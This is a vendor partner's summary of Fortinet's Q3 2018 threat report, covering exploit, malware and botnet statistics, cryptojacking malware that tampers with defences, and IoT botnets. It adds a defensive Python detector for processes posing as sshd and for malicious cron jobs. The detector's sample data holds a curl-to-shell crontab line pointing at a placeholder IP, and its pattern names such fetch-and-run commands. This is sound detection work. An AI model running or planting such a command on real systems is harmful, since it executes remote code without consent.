Threat Landscape Report Q3 2018 – Fortinet

Protect your business from increased cyber threats and attacks.

Read Fortinet’s quarterly review of the cyber-threat landscape.
Fusion partners with global security expert Fortinet to provide clients with end-to-end security. Fortinet gives useful perspectives on the global threat landscape that businesses can take action on in their local environment.

Here are some highlights from the report.

Quick Stats for Q3: Exploits
§ Exploit Index rose 2%
§ 7,925 unique exploits detected
§ 1,114 detections per firm
§ 65.4% of firms saw severe exploits
§ IoT exploits increased in prevalence
§ 20 zero days found by FortiGuard Labs

Quick Stats for Q3: Malware
§ Malware Index rose 4%
§ 34,148 unique variants detected
§ 21 unique daily detections per firm
§ 4 variants spread to ≥10% of firms
§ 19% saw cryptojacking malware
§ 26% reported mobile malware

Whereas exploit and malware trends usually show the pre-compromise side of attacks, botnets give a post-compromise viewpoint. Once infected, systems often communicate with remote malicious hosts, and such traffic in a corporate environment indicates that something has already gone wrong. That makes this dataset valuable from a “learning from our mistakes” perspective.
The Botnet Index for the quarter trended up, but not as much as the overall Threat Landscape Index (TLI). Botnets differ from exploits and malware in that the most prevalent botnets remain relatively static from quarter to quarter. In fact, the top seven botnets from Q2 are the same in Q3, with one minor change in ordering (Sality moved from No. 7 to No. 5). That kind of consistency is remarkable given how dynamic the rest of the threat landscape is.

Quick Stats for Q3: Botnets

§ 257 unique botnets detected
§ 10.2 infection days per firm
§ 3.2% of firms saw ≥10 bots
§ 58% of infections lasted 1 day
§ 4% of infections lasted >1 week

LONG-TERM TRENDS FORTINET IS TRACKING:
§ Economic dynamics driving the development of ransomware, cryptojacking, and other crimeware
§ Evolution of rapid malware development through code reuse, agile approaches, and other methods
§ Continued rise of destructive threats and the changing impact on business risk and resiliency
§ Evolution of attacks targeting critical infrastructure and IoT devices

MINI FOCUS: IS CRYPTOJACKING JACKING UP YOUR DEFENSES?

When we look back at 2018, cryptojacking will almost certainly be in the running for “Threat of the Year” recognition. But because cryptojacking doesn’t attempt to steal data, wipe the system, or deliver some other malicious payload, not everyone views it as a critical threat to their organization. We’re all for prioritizing threats by risk to the business, but what many don’t realize is that cryptojacking malware often compromises the defenses of the systems it runs on, so the miner is rarely the only problem. Below are some examples of this behavior.
§ PowerGhost alters preferences for system scans and updates and disables Windows Defender through the registry. It has also been observed downloading a DDoS tool.
§ PyRoMine creates a backdoor account called “Default” so attackers can gain remote access with admin privileges. It enables RDP and opens the RDP port in the Windows Firewall. It also disables services, deletes net users, and kills processes.
§ Adylkuzz can change firewall rules and kill processes such as the Microsoft Management Console. It also stops and deletes the Event Log Management service.
§ RubyMiner clears out all existing cron jobs and schedules a cron job for itself. Any scheduled scripts or programs, including those with security functionality, are wiped out in the process.
§ The Jenkins miner is perhaps the most interesting. It downloads and runs a Linux binary that remains a mystery, since no one was able to obtain a copy; it could be a different miner or a Linux rootkit used to hide the infection. Speaking of hiding, the Jenkins miner can fake its process name so that it appears as “/usr/sbin/sshd” in the list of running processes.
Beyond these examples, we see a strong correlation between cryptojacking and other types of malware in our dataset.
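The two Linux-side behaviors in the list above (the Jenkins miner hiding behind the name /usr/sbin/sshd, and RubyMiner replacing the crontab with its own fetch-and-run entry) can both be checked from a host snapshot. The script below is an added example written for this page; it is not Fortinet’s code and is not described in the report. The sshd install paths, the regular expressions, the process records and the crontab line are all assumptions or constructed sample data, not observations from a real host.

```python
"""Linux host checks for the defence-tampering behaviours described above.

Check 1 (Jenkins miner): a process whose argv[0] claims to be sshd while
/proc/<pid>/exe resolves to a different binary, or to one deleted from disk.
Check 2 (RubyMiner): a crontab entry that fetches a remote script and pipes
it straight into a shell.
Both checks take plain snapshots, so they run offline on the constructed
sample data below or on a live host via read_live_procs().
"""
import os
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    argv0: str   # first element of /proc/<pid>/cmdline
    exe: str     # os.readlink('/proc/<pid>/exe'); '' if unreadable (needs root)


# Assumed install paths for the real daemon; adjust per distribution.
SSHD_PATHS = {"/usr/sbin/sshd", "/usr/bin/sshd"}
# argv[0] forms a real sshd uses: '/usr/sbin/sshd' or 'sshd: alice [priv]'
CLAIMS_SSHD = re.compile(r"^(?:\S*/)?sshd\b")
# 'curl ... | sh', 'wget ... | bash', etc. on one cron line (assumed heuristic)
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|python\d?)\b")


def spoofed_sshd(procs):
    """Return (pid, reason) for processes that claim to be sshd but are not."""
    findings = []
    for p in procs:
        if not CLAIMS_SSHD.match(p.argv0) or not p.exe:
            continue  # not claiming sshd, or exe link unreadable: undecidable
        if p.exe.endswith(" (deleted)"):
            findings.append((p.pid, f"sshd-named process, binary removed from disk: {p.exe}"))
        elif p.exe not in SSHD_PATHS:
            findings.append((p.pid, f"argv[0] says sshd but executes {p.exe}"))
    return findings


def suspicious_cron(crontab_text):
    """Return the non-comment cron lines that pipe a downloaded script into a shell."""
    entries = [l for l in crontab_text.splitlines()
               if l.strip() and not l.lstrip().startswith("#")]
    return [l for l in entries if FETCH_AND_RUN.search(l)]


def read_live_procs():
    """Snapshot /proc on a Linux host (exe links of other users' processes need root)."""
    procs = []
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
        except OSError:
            continue  # process exited between listdir() and open()
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""
        procs.append(Proc(int(pid), argv0, exe))
    return procs


# Constructed sample data (not taken from a real host).
SAMPLE_PROCS = [
    Proc(812, "/usr/sbin/sshd", "/usr/sbin/sshd"),             # real listener
    Proc(2301, "sshd: alice [priv]", "/usr/sbin/sshd"),         # real session child
    Proc(4711, "/usr/sbin/sshd", "/tmp/.x/kworkerds"),          # miner wearing sshd's name
    Proc(4712, "/usr/sbin/sshd", "/usr/sbin/sshd (deleted)"),   # binary unlinked after start
    Proc(900, "/usr/bin/python3", "/usr/bin/python3.11"),       # unrelated
]
SAMPLE_CRONTAB = "*/15 * * * * curl -fsSL http://203.0.113.10/u.sh | sh\n"

if __name__ == "__main__":
    for pid, reason in spoofed_sshd(SAMPLE_PROCS):
        print(f"pid {pid}: {reason}")
    for line in suspicious_cron(SAMPLE_CRONTAB):
        print(f"cron: {line}")
```

Two caveats when running this on real hosts: a legitimate sshd that kept running across a package upgrade will also show an exe link ending in “(deleted)”, so treat that finding as a prompt to compare against the package manager rather than as proof of compromise; and the cron heuristic only catches the fetch-and-pipe pattern, so also diff the current crontab against a known-good copy to catch the “cleared out all cron jobs” side of the RubyMiner behavior.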

MINI FOCUS: THE EVOLUTION OF IoT BOTNETS
IoT botnets rose to notoriety in September 2016 with the advent of Mirai and the 600,000 infected IoT devices under its control. Mirai’s source code was released to the public the following month, for reasons that remain unknown, and the leak has since produced more capable variants such as Satori, JenX, OMG, and Wicked.

Recent Developments
Mirai’s main method of propagation was scanning for IoT devices and brute-forcing their login credentials. Over time this shifted to exploiting vulnerabilities in the devices themselves. Reaper, for example, targeted many vulnerabilities in IoT devices from vendors such as NETGEAR, GoAhead, Linksys, and AVTECH. It contained a Lua engine that ran its exploits from scripts, which made exploits easy to swap in and out. It is now common for an IoT botnet to carry multiple exploits for many different device types.

Another new development in current botnets is the trend toward decentralized command-and-control infrastructure using peer-to-peer (P2P) communication. The exact P2P protocol depends on the botnet: some reuse existing protocols, others rely on custom-built ones. The advantages of decentralized command and control are twofold: first, it makes the botnet more resilient to takedown attempts, and second, it allows the botnet to spread far more rapidly.

The previously mentioned variant OMG turns infected devices into proxy servers that can be rented to customers who want to hide their traffic behind multiple proxies. IoT botnets have also begun to implant cryptojacking malware on infected IoT devices. Another risk posed by IoT botnets is that infected devices can be rendered useless, and this applies to everything from smart TVs and coffee machines to medical devices.

An example of an IoT botnet targeting an entire country is VPNFilter and its attack on Ukraine. Devices infected with VPNFilter carried a kill switch that allowed the attackers to destroy the device with a single command. In addition, the botnet could inject malicious code into network sessions passing through an infected device, which gave it a way to infect the endpoint devices behind it.

Future Directions
IoT botnets will continue to evolve and grow. One possible avenue for this growth is the application of machine learning or data analytics, allowing a botnet to refine itself by finding the most efficient exploits and the most vulnerable devices.
Defense against IoT botnets is challenging, to say the least. Fortinet recommends off-site storage of system backups, redundant systems, keeping devices updated, segmenting IoT devices from the production network, monitoring the traffic that crosses between those segments, and using real-time threat intelligence.

CONCLUSIONS AND RECOMMENDATIONS

Fortinet’s summary of recommendations, inspired by the trends discussed in the Q3 report.


Connect with the FortiGuard Labs team at @FortiGuardLabs or with the hashtag #FortiResearch. You can also find us at @Fortinet and @FortinetPartner for the latest business and cybersecurity insights.